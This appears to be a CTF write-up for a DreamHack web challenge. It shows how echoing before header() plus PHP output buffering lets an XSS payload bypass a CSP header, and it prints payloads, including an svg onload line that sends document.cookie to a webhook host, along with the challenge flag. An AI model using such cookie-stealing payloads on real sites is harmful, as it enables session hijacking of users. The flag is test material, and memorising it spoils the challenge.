DreamHack - [Buffalo Wings challenge writeup]

In index.php, echo is called before the header() function. If output reaches the browser before header() runs, the CSP header might not be applied, which would eventually let us execute JavaScript code. Let’s verify it.

Send a comment payload like the one below.

comment = lol<img src=1 onerror=alert(1)>

However, no alert pops up. After searching on Google, I learned that this is due to PHP's output buffering behaviour. Look at this line in the Dockerfile:

RUN sed -i '215s/4096/8192/' /etc/php/7.4/fpm/php.ini

It edits line 215 of the PHP configuration, changing 4096 to 8192. This changes the output buffering size from 4096 bytes to 8192 bytes.

Now we know why our first payload does not work: the buffer is not filled, so PHP holds the output until the header() function is called and only then sends everything to the browser.

So our target is to overflow 8192 bytes, but $comment is limited to 500 characters.

Now here comes the magic. If the comment text contains “script”, the page additionally echoes “Malicious string Detected !!!!!” and then the comment with “script” filtered out. What matters is that this runs inside a while loop, which keeps echoing as long as “script” exists. This is where we can overflow the buffer.

The idea is to let the while loop run as long as possible, to overflow 8192 bytes. We can achieve that by adding a long string like this.

scrscrscrscrscrscr...iptiptiptiptiptipt

Each pass removes the “script” in the middle of this payload, and the remaining string then forms another “script” in the middle again.
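The following is an added example, not code from the challenge or the original post: a simplified Python model of why the loop output defeats the late header() call, and why sending the header first fixes it. It assumes each loop pass echoes the warning plus the filtered comment (index.php itself is not shown on this page) and that the buffer flushes once buffered bytes reach the configured size; all function names are hypothetical.

```python
# Simplified model of PHP output buffering vs. header() ordering.
# Assumed from the writeup's description (index.php itself is not shown):
# each loop pass echoes the warning plus the comment with "script" removed.
WARNING = "Malicious string Detected !!!!!"
MAX_COMMENT = 500          # comment length limit stated in the writeup
BUFFER_SIZE = 8192         # output_buffering value set by the Dockerfile


def filter_loop_chunks(comment):
    """Yield each chunk the filter loop would echo (hypothetical reconstruction)."""
    comment = comment[:MAX_COMMENT]
    while "script" in comment:
        comment = comment.replace("script", "")   # one removal pass per iteration
        yield WARNING + comment
    yield comment                                  # final echo of the clean comment


def echoed_bytes(comment):
    """Total bytes written to the output buffer for one comment."""
    return sum(len(c.encode()) for c in filter_loop_chunks(comment))


def csp_header_applied(comment, buffer_size=BUFFER_SIZE, header_first=False):
    """Return True if the CSP header can still be attached to the response.

    header_first=False models the page's order: echo first, header() later.
    header_first=True models the fix: header() before any output.
    """
    if header_first:
        return True            # header queued before any body byte exists
    buffered = 0
    for chunk in filter_loop_chunks(comment):
        buffered += len(chunk.encode())
        if buffered >= buffer_size:
            return False       # buffer flushed: headers already sent
    return True                # everything still buffered when header() runs


# Constructed sample inputs (no markup, only the nesting pattern).
plain = "hello"
nested = "hello " + "scr" * 80 + "ipt" * 80      # 486 chars, 80 loop passes

if __name__ == "__main__":
    for name, c in (("plain", plain), ("nested", nested)):
        print(name, echoed_bytes(c), csp_header_applied(c),
              csp_header_applied(c, header_first=True))
```

Running it shows that a 486-character nested comment produces well over 8192 bytes of output, so the header is lost in the echo-first order and kept when header() is called before any output.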

Let’s send a new payload.

lol<img src=1 onerror=alert(1)> scrscrscrscrscrscr...iptiptiptiptiptipt

This time, the alert popped up. Yay, we can perform XSS. Now we just need to send the payload to the bot and steal the cookie.

Remember to URL-encode the payload before sending:

lol<svg onload=location.href="{webhook_url}?cookie="+encodeURIComponent(document.cookie)> scrscrscrscrscrscr...iptiptiptiptiptipt

🚩 FLAG: DH{8b8d436dfb2a5a5459b9eb85fba631060ca6417fead150edb68980e107f5b90}

DreamHack - [Buffalo Wings challenge writeup]
https://minhi1.github.io/minhi1-blogs/posts/dreamhack/level-5/buffalo-wings/
Author: Minhi1
Published at: 2026-01-11
License: CC BY-NC-SA 4.0